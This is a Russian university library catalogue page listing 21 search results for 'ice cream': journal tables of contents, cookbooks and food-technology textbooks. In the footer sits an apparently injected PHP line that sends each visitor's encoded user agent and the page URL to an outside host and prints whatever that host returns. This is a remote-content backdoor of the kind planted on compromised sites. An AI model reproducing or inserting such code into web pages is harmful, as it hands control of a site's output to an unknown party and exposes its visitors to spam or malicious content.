Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

283 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МОРОЖЕНОЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 21
1. 
Современная торговля. - Журнал, 2003г. № 9
Оглавление 
  • Сидельникова, О. Время топ-менеджера - неразрешимая проблема? / О. Сидельникова. - с.4-5 : ил.
    Кл. слова: Рабочий день менеджера
  • Подводные камни денежного потока. - с.6-8 : ил.
    Кл. слова: Чистый денежный поток, Прибыль
  • Дудник, И. 10 ошибок в подборе кадров / И. Дудник. - с.9-12 : ил.
    Кл. слова: Персонал, Штат
  • Причины многих неудач - не принимаются меры для предотвращения потерь. - с.13-17 : ил.
    Кл. слова: Кража в магазине, Воровство в торговле
  • Алямкина, О. Сколько стоит бизнес, или как продать магазин? / О. Алямкина. - с.20-24 : ил.
    Кл. слова: Недвижимость
  • Нет пустоты на овощных прилавках. - с.25-27 : ил.
    Кл. слова: Конъюнктура рынка
  • Кузьмичева, М. Что лучше: с глазурью или фруктовое, в стаканчике или брикете? / М. Кузьмичева. - с.28-32 : ил.
    Кл. слова: Мороженое, Конъюнктура рынка
  • Мумрикова, Г. Деловой обед делового человека / Г. Мумрикова. - с.34-36 : ил.
    Кл. слова: Бизнес-ланч
  • Яковлева, Ю. Магазин, продающий стиль жизни / Ю. Яковлева. - с.38-40 : ил.
    Кл. слова: Спортивный магазин, СПОРТИВНЫЙ ТОВАР
  • Манекены: оборудование и дизайн торгового зала. - с.42-44 : ил.
    Кл. слова: Манекен
  • Яковлева, Ю. Делаем деньги из... воды / Ю. Яковлева. - с.45-47 : ил.
    Кл. слова: Льдогенератор, Производство льда
  • Яковлева, Ю. В Россию пришел бутик / Ю. Яковлева. - с.52-55 : ил.
Держатели документа (Информация об экземплярах) 
2. 
Постный стол [Текст] / ред., сост. Т. А. Ружинская, дар. А. В. Мышлявцев, 1999. - 345 с.
Держатели документа (Информация об экземплярах) 
3. 
Авроров, Валерий Александрович. Традиционные народные технологии приготовления пищи из натуральных продуктов [Текст] / В. А. Авроров, Н. В. Моряхина, Н. Д. Тутов, 2017. - 287 с.
Держатели документа (Информация об экземплярах) 

Приведены рецепты различных скоромных и постных блюд, холодных и горячих закусок, салатов, саусов, маринадов, напитков, выпечки, сладких блюд, пасхи, мороженого и др., приготовляемых в домашних условиях.

Даны рекомендации по достижению вкусовых качеств блюд.

Предлагаемые рецепты блюд были хорошо известны в свое время, а некоторые из них и сегодня используются на предприятиях общественного питания.

Для всех приведенных рецептов характерно использование только натурального и высококачественного растительного и животного пищевого сырья и полуфабрикатов.

Учебное пособие предназначено для студентов вузов, обучающихся по направлениям "Технология продукции и организация общественного питания", "Продукты питания из растительного сырья".

4. 
Кулинария [Текст] / П. В. Абатуров [и др.] ; дар. В. С. Михайленко, 1955. - 959, [1] с.
Держатели документа (Информация об экземплярах) 
5. 
Химия и жизнь - XXI век. - Журнал, 2012г. № 2
Оглавление 
  • Котина, Е. Кто лучший? / Е. Котина. - с.3-7
  • Комаров, С. М. Графен и водород / С. М. Комаров. - с.8
  • Комаров, С. М. Холод от давления / С. М. Комаров. - с.8
  • Комаров, С. М. Виагра и сердце / С. М. Комаров. - с.8
  • Комаров, С. М. Плазма против вируса / С. М. Комаров. - с.8
  • Комаров, С. М. Воду в водород / С. М. Комаров. - с.9
  • Комаров, С. М. Шум не пройдет / С. М. Комаров. - с.9
  • Комаров, С. М. Выплавка наночастиц / С. М. Комаров. - с.9
  • Комаров, С. М. Управа на гусеницу / С. М. Комаров. - с.9
  • Протопопов, А. В. Юка, или рассказ о мамонте и его мире / А. В. Протопопов, Г. Г. Боескоров, В. Н. Потапов. - с.10-11
  • Боескоров, Г. Г. Новый гость из вечной мерзлоты / Г. Г. Боескоров, В. В. Плотников, Е. Н. Мащенко. - с.12-13
  • Мащенко, Е. Н. Портрет подростка / Е. Н. Мащенко, О. Р. Потапова, Л. Агенброд. - с.14-15
  • Сутоцкая, Е. Наш друг иммунитет / Е. Сутоцкая. - с.16-17
  • Лешина, В. Средиземноморская диета для полимеров / В. Лешина. - с.19-21
  • Космачевская, О. В. Вездесущая реакция Майара / О. В. Космачевская. - с.23-27
  • Благутина, В. В. Еще одна надежда человечества / В. В. Благутина. - с.28-31
  • Комаров, С. М. Активность на северном фронте / С. М. Комаров. - с.32-35
  • Резник, Н. Л. Питон - проверка слуха / Н. Л. Резник. - с.36-38
  • Иванов, Ю. Броники / Ю. Иванов. - с.39
  • Эрлих, Г. Практическое эвриковедение / Г. Эрлих. - с.41-46
  • Хатуль, Л. Естественнонаучное для гуманитарного / Л. Хатуль. - с.48-51
  • Анина, Н. О счастье и долголетии / Н. Анина. - с.52-53
  • Ручкина, Н. Мороженое / Н. Ручкина. - с.54-55
  • Медведева, Е. На небо по звездочки / Е. Медведева. - с.57-61
  • Анофелес, С. Европейский денатурат / С. Анофелес. - с.62
  • Мотыляев, А. "Болото" и меньшинство / А. Мотыляев. - с.63
  • Леенсон, И. А. Кто открыл, кто синтезировал? / И. А. Леенсон. - с.64-65
Держатели документа (Информация об экземплярах) 
6. 
Вокруг света. - Журнал, 2003г. № 12
Оглавление 
  • Футуристическое сафари. - с.6-13
  • Попова, Любовь. Подражай и властвуй / Л. Попова. - с.24-44
  • Русакова, Нина. Лекарство или наркотик / Н. Русакова. - с.44
  • Как оценивают жители России свой внешний вид. - с.46
  • Декабрь. - с.50-56
  • Новый взгляд на аэродинамику. - с.64-65
  • Дизельный бум. - с.66-68
  • Автомобильному дизайну - 75. - с.70
  • Фатющенко, Андрей. Танцы на границе / А. Фатющенко. - с.72-101
  • Сколько лет Д' Артаньяну?. - с.102-103
  • Растут ли кактусы на деревьях?. - с.103
  • Откуда пришел хоккей?. - с.104
  • Паршев, Андрей. Космический плацдарм / А. Паршев. - с.106-119
  • Гранин, Даниил. "Сильно прибыло красоты..." / Д. Гранин. - с.122-131
  • Почему в неделе 7 дней?. - с.132
  • Какая работа под силу сердцу?. - с.132
  • Как услышать шум моря?. - с.132
  • Как Нобель распорядился своим капиталом?. - с.143
  • Кому не страшен змеиный яд?. - с.134
  • Какую посуду выбрать?. - с.135
  • Иванов, Дмитрий. Охотники на тюленей / Д. Иванов. - с.136-145
  • Шкатулка с секретом. - с.146
  • Павловская, Анна. Особенности национального характера, или За что скандинавы любят мороженое / А. Павловская. - с.148-162
  • Бурба, Георгий. И дольше года длится день / Г. Бурба. - с.164-173
  • Чутко, Игорь. Предтеча золотого века / И. Чутко. - с.176-182
  • Голованов, Василий. Марш несокрушимых / В. Голованов. - с.184-195
  • Делу время - потехе час?. - с.196
  • Зорина, Евгения. Алхимия запахов / Е. Зорина. - с.198-201
  • Боль отвержения. - с.202
  • Захаров, Сергей. Я - собака / С. Захаров. - с.210-213
  • Репейник - универсал. - с.216
7. 
Общепит: бизнес и искусство. - Журнал, 2017г. № 4
Оглавление 
  • Кафе "Му-Му". - с.8-12
    Кл. слова: кафе, открытие кафе, система обслуживания, формат "фри-фло", меню, качество, детские праздники
  • В гармонии с вином. - с.13-17
    Кл. слова: компания Spiegelau, хрустальное стекло, ресторанная посуда, практичность
  • Осовская, Г. Тайская национальная кухня - дьявольская острота и эмоции / Г. Осовская. - с.18-23
    Кл. слова: Тайская кухня, культура питания, тайское меню
  • Лунева, О. Н. Предпочтения потребителей при выборе творожных продуктов / О. Н. Лунева, Т. Н. Иванова, В. В. Зегелева. - с.24-31
    Кл. слова: творог, кисломолочные продукты, показатели, хпрактеристика, качество продукта
  • Бронникова, В. В. Производство и формирование ассортимента йогурта на современном этапе / В. В. Бронникова. - с.32-41
    Кл. слова: йогурт, закваска, стрептококки, бифидобактерии, сквашивание, производство, молочные продукты
  • Серова, О. П. Расширение ассортимента мороженого / О. П. Серова, Д. А. Скачков, С. В. Подхватилина. - с.42-48
    Кл. слова: мороженое, пищевая ценность, витамины, пищевые волокна, молочные продукты, химический состав, рецептура мороженого
  • Львутина, Е. А. Единая государственная автоматизированная информационная система (ЕГАИС) как эффективный способ борьбы с алкогольной фальсифицированной продукцией / Е. А. Львутина. - с.50-54
    Кл. слова: алкогольная продукция, фальсификация, качество, безопасность, этапы внедрения ЕГАИС, мобильное приложение, АнтиконтрафактАлко
  • Страхова, С. А. Рецептура мясных котлет с использованием топинамбура / С. А. Страхова, И. А. Зачесова, С. В. Колобов. - с.56-60
    Кл. слова: мясные продукты, мясо, полуфабрикаты,топинамбур, рецептура, технология
  • Зеленый чай - полезный напиток. - с.64-67
    Кл. слова: напитки, качество, здоровый образ, лечебное средство, профилактика, показатели чая, витаминная ценность
Держатели документа (Информация об экземплярах) 
8. 
Пищевая промышленность. - Журнал, 2009г. № 11
Оглавление 
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-август 2009 г.. - с.6-7
  • Шумовецкий, Г. А. Гранулометрический состав затравочных материалов и кристаллов сахаров продуктовых утфелей / Г. А. Шумовецкий, М. Б. Мойсеяк. - с.12-13
  • Ким, И. Н. Технология производства лососевой икры с использованием молочной сыворотки / И. Н. Ким, Т. И. Штанько. - с.42-44
  • Кутина, О. И. Биологическая ценность кулинарных изделий на основе океанических рыб / О. И. Кутина, Т. Н. Шарова. - с.45
  • Разработка антиоксидантных комплексов "Цифрол-5" и "Цифрол-дерма". - с.46-48
  • Пруидзе, Э. Г. Пряники функционального назначения / Э. Г. Пруидзе, М. А. Силагадзе, Г. С. Хецуриани. - с.50-51
  • Жиры ААК для пищевой промышленности. - с.52
  • Тимофеева, В. Н. Продукты переработки рябины садовой и аронии черноплодной / В. Н. Тимофеева, Н. В. Саманкова. - с.54-56
  • Киселев, В. М. Эволюционная методология проектирования функциональных продуктов / В. М. Киселев, Е. Г. Першина. - с.57-59
  • [Новости компаний]. - с.60-61
  • Открытие бараночной линии на "Волжском пекаре". - с.62-63
  • [Новости отраслевых союзов]. - с.64-65
  • [Новости НИИ и вузов]. - с.66
  • Бурдун, Н. И. Развивать рыбную отрасль / Н. И. Бурдун. - с.67
  • World Food Moscow 2009: первые итоги. - с.68
  • Агропродовольственный форум. - с.68-69
  • Современные холодильные машины на выставке "Холодильное оборудование". - с.69
  • 50 лет успеха во благо России!. - с.70
  • Драчева, Л. В. Nutrasport-2009 / Л. В. Драчева. - с.71
  • Выбор профессионалов - признание потребителей!. - с.72
  • Драчева, Л. В. Rusnanotech-2009 / Л. В. Драчева. - с.73
  • Бурдун, Н. И. Основные задачи мукомольной отрасли / Н. И. Бурдун. - с.74
  • Брызгунова, Г. М. Конференция по европейским сырам / Г. М. Брызгунова. - с.75
  • Бурдун, Н. И. Рассмотрели важные вопросы / Н. И. Бурдун. - с.75
  • "Индустрия Напитков/Russian Wine Fair 2009". - с.76
  • Сидоренко, Ю. И. Задачи товароведения в области разработки и организации оборота инновационных продуктов питания / Ю. И. Сидоренко, Г. И. Андреев. - с.8-11
  • Кривовоз, А. Г. Цветность - показатель качества продуктов / А. Г. Кривовоз, Ю. И. Сидоренко. - с.14
  • Туманова, А. Е. Экспертиза кондитерских изделий в рамках программы "Российское качество" / А. Е. Туманова, Е. И. Тавер. - с.16-17
  • Саловарова, В. П. Направления международного сотрудничества и развития инновационной деятельности при подготовке специалистов товарного консалтинга и экспертизы / В. П. Саловарова, В. Я. Андрухова. - с.18-19
  • Драчева, Л. В. Товароведение-2009 / Л. В. Драчева. - с.20
  • Каргина, Е. Б. Поле стандартов и схем управления безопасностью пищевой продукции: легко ли сделать правильный выбор? / Е. Б. Каргина, Е. А. Боброва. - с.22-26
  • Мороженое, обогащенное растительными жирами, полезно для здоровья. - с.27
  • Грищенко, Ф. В. Технологические процессы в пищевой промышленности: состояние и современные тенденции развития международной нормативной базы / Ф. В. Грищенко. - с.28-29
  • Маюрникова, Л. А. Роль научно-инновационной деятельности в подготовке студентов / Л. А. Маюрникова, С. В. Новоселов. - с.30-32
  • Попова, А. В. Управление опасными факторами на предприятиях пищевой промышленности / А. В. Попова, С. В. Иванченко, И. В. Сурков. - с.33
  • Матисон, В. А. Оценка качества ресторанных услуг / В. А. Матисон, К. В. Китайкин. - с.34-35
  • Технология охлаждения и хранения рыбы горячего копчения с применением антимикробных пищевых покрытий. - с.36-37
  • Елисеева, С. А. Совершенствование технологии централизованного производства заправочных супов / С. А. Елисеева. - с.38-40
9. 
Питание и общество. - Журнал, 2012г. № 8
Оглавление 
  • Забнев, С. Качество растворимого кофе / С. Забнев. - с.17
    Кл. слова: КОФЕ
  • Арефьева, Е. Охлажденное счастье / Е. Арефьева. - с.30-31
    Кл. слова: МОРОЖЕНОЕ
  • Амирасланов, Т. И. Дастан о пахлаве / Т. И. Амирасланов. - с.28-29
    Кл. слова: ПАХЛАВА
10. 
Десерты и напитки [Текст] / сост. Е. В. Шиш ; дар. В. А. Козлова, 1995. - 490, [1] с.
Держатели документа (Информация об экземплярах) 
11. 
Арет В. А. Физико-механические свойства сырья и готовой продукции [Текст] / В. А. Арет, Б. Л. Николаев, Л. К. Николаев ; дар. В. В. Арсеньев, 2009. - 442, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии широко освещены и теоретические, и экспериментальные составляющие курса. Изложены основы инженерной реологии и ее применения в расчетах оборудования жиолслдержащих пищевых продуктов. Приведены выводы расчетных зависимостей, что облегчает понимание физической и математической сущности рассматриваемых вопросов. Достаточно полно представлены экспериментальные данные реометрии мноших жиросодержащих продуктов при их различных фазовых состояниях: застывшем состоянии, в стадии плавления и в расплавленном виде. Экспериментальные данные приводятся в широком интервале градиента скорости и касательного напряжения, что возволяет использовать их для расчета различного оборудования.

12. 
Проектирование предприятий молочной отрасли с основами промстроительства [Текст] : учеб. пособие для вузов по специальности 260303 "Технология молока и молочных продуктов" направления подгот. дипломир. специалистов 260300 "Технология сырья и продуктов животного происхождения" / Л. В. Голубева [и др.], 2010. - 284, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрены основные типы предприятий, основы автоматизированного проектирования, изложены основные вопросы проектирования и сметной документации при строительстве и реконструкции предприятий. Дан перечень типовых проектов заводов, их особенности и преимущества перед индивидуальными проектами. Приведены особенности курсового и дипломного проектирования, дипломной работы для бакалавриата.

13. 
Территориальные единичные расценки на монтаж оборудования. Омская область [Текст]. Ч. 28 : Оборудование предприятий пищевой промышленности, 2010. - 56 с.
Ключевые слова 
ТЕРм 81-03-28-2001 -- СМЕТНЫЙ -- НОРМАТИВ -- ДОЗИРОВАНИЕ -- МУКА -- СМЕШИВАНИЕ -- ПРИГОТОВЛЕНИЕ -- ДРОЖЖИ -- ДЕЖИ -- ТЕСТО -- СУШИЛКА -- СУХАРЬ -- РАСФАСОВКА -- САХАР -- МОЙКА -- МЕШАЛКА -- ЛОВУШКА -- ФИЛЬТРАЦИОННОЕ -- ВОДООТДЕЛИТЕЛЬ -- ВОДООТВОДЧИК -- ПРЕСС -- ДИФФУЗИОННОЕ -- ПЕЧЬ -- РАЗДЕЛКА -- ТУША -- ЛЬДОГЕНЕРАТОР -- ПОСОЛЬНОЕ -- РЕЗЕРВУАР -- МОЛОКО -- ТЕРМООБРАБОТКА -- СЛИВКИ -- МАСЛО -- СЫР -- МОРОЖЕНОЕ -- КАЗЕИН -- ДРОБИЛКА -- УКУПОРКА -- МАКАРОНЫ -- КОНФЕТЫ -- ВИНОГРАД -- СПИРТ -- ПИВО -- ТАБАК -- ЧАЙ -- КАРТОНАЖНЫЕ -- ОБЩЕСТВЕННОЕ -- ПИТАНИЕ -- ЖЕСТЯНАЯ -- ТАРА -- СОЛОД -- СУСЛО
Держатели документа (Информация об экземплярах) 
14. 
Холодильная обработка молока и молочных продуктов [Текст] : сб. науч. тр. / ВНИКТИхолодпром, 1985. - 95, [1] с.
Держатели документа (Информация об экземплярах) 
15. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

16. 
Расчет материальных потоков при переработке молока в курсовом и дипломном проектировании [Текст] : учеб. пособие для вузов по направлению 260300 "Технология сырья и продуктов животного происхождения" по специальности "Технология молока и молочных продуктов" / И. А. Евдокимов [и др.], 2009. - 271 с.
Держатели документа (Информация об экземплярах) 

Учебное пособие представляет собой руководство по выполнению расчетов материальных потоков при переработке молока на различные виды молочных продуктов цельномолочного, маслодельного, сыродельного и молочноконсервного направлений. В пособии приведены схемы безотходной переработки молока на продукты цельномолочного производства, масло, сыр и молочные консервы, нормы расхода сырья и основных компонентов при выработке молочных продуктов, нормируемые потери по отдельным технологическим операциям, рецептурные составы основных видов продуктов.

17. 
Товароведение и экспертиза пищевых жиров, молока и молочных продуктов [Текст] : Учебник гриф-УМО / под ред. М. С. Касторных, 2003. - 288 с.
Держатели документа (Информация об экземплярах) 
18. 
Богушева, Валентина Ивановна. Технология приготовления пищи [Текст] / В. И. Богушева, 2010. - 374, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии представлен весь комплекс теоретических основ производства продукции общественного питания.

Дана характеристика химического состава и физических свойств различных продуктов. Рассмотрены основные способы и приемы первичной обработки сырья и приготовления полуфабрикатов. Характеризуются приемы тепловой обработки, а также изменения, происходящие в продуктах под влиянием высоких температур.

Основная часть пособия посвящена технологии приготовления кулинарных блюд, правилам их оформления и подачи.

Особое внимание обращается на требования, предъявляемые к качеству продукции общественного питания, срокам ее хранения и реализации.

В последних главах освещаются вопросы лечебного и детского питания, дается характеристика различных диет.

Предназначено для студентов технологических, торгово-экономических, кооперативных колледжей и техникумов. Он может представлять интерес и для практических работников, обучающихся в системе переподготовки кадров и повышения квалификации.

19. 
Товароведение однородных групп продовольственных товаров [Текст] / ред. Л. Г. Елисеева, 2014. - 929 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МАРКИРОВКА ТОВАРА -- УПАКОВКА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ТОВАРЫ ПЛОДООВОЩНЫЕ -- ПОТЕРИ ПЛОДОВ -- ПОТЕРИ ОВОЩЕЙ -- КОНСЕРВИРОВАНИЕ ПЛОДООВОЩНОЙ ПРОДУКЦИИ -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ САХАРИСТЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- СПРЕД -- МАЙОНЕЗ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОРОЖЕНОЕ -- МАРКИРОВКА МОЛОЧНОЙ ПРОДУКЦИИ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ ДЕТСКОЕ -- МЯСО -- МЯСО ПТИЦЫ -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ

Учебник подготовлен в соответствии с образовательным стандартом третьего поколения – ФГОС ВПО по направлению подготовки «Товароведение» по базовой дисциплине профессионального цикла «Товароведение однородных групп продовольственных товаров».

В нем рассматриваются основные понятия и задачи товароведения продовольственных товаров, научные принципы систематизации и классификации продовольственных товаров, факторы, влияющие на формирование и сохранение их потребительских свойств. Дана характеристика пищевой ценности и потребительских свойств однородных групп продовольственных товаров, представлены современные принципы их классификации и кодирования, изложены требования к качеству и безопасности, рассмотрены основные дефекты и причины их возникновения, режимы хранения и сроки годности.

Для студентов бакалавриата, обучающихся по направлениям подготовки «Товароведение», «Торговое дело», «Технология продукции и организация общественного питания» и «Экономика».

20. 
Машины и аппараты пищевых производств [Текст] : учеб. для вузов по направлению подгот. дипломир. специалистов "Пищевая инженерия": в 3 кн. / под ред. В. А. Панфилова. Кн. 1 / С. Т. Антипов [и др.], 2009. - 607, [1] с.
Держатели документа (Информация об экземплярах) 

В учебнике обобщены сведения о состоянии и перспективе технического обеспечения пищевых и перерабатывающих производств. Особое внимание уделено проблемам, стоящим перед специалистами в деле повышения эффективности машинных технологий продуктов питания. Представлены современные формы организации технологических комплексов, а также машинно-аппаратурные схемы линий для переработки сельхозсырья растительного и животного происхождения, а также морепродуктов в продукты питания. Изложены научные основы реализуемых процессов и инженерные расчеты важнейших характеристик машин и аппаратов. Описано оборудование для ведения механических, гидромеханических, тепломассообменных и биотехнологических процессов, а также для дозирования и упаковывания пищевых продуктов. Рассмотрены методы организации технического обслуживания и ремонта оборудования, приоритетные научные проблемы и инженерные задачи развития пищевых производств, вопросы организации создания новой техники.

21. 
Абатуров, Павел Васильевич. Сладкие блюда. Напитки [Текст] / П. В. Абатуров, Н. П. Цыпленков, 1958. - 136 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3215 - 29.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.16 с.24 запросов, 0.83c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;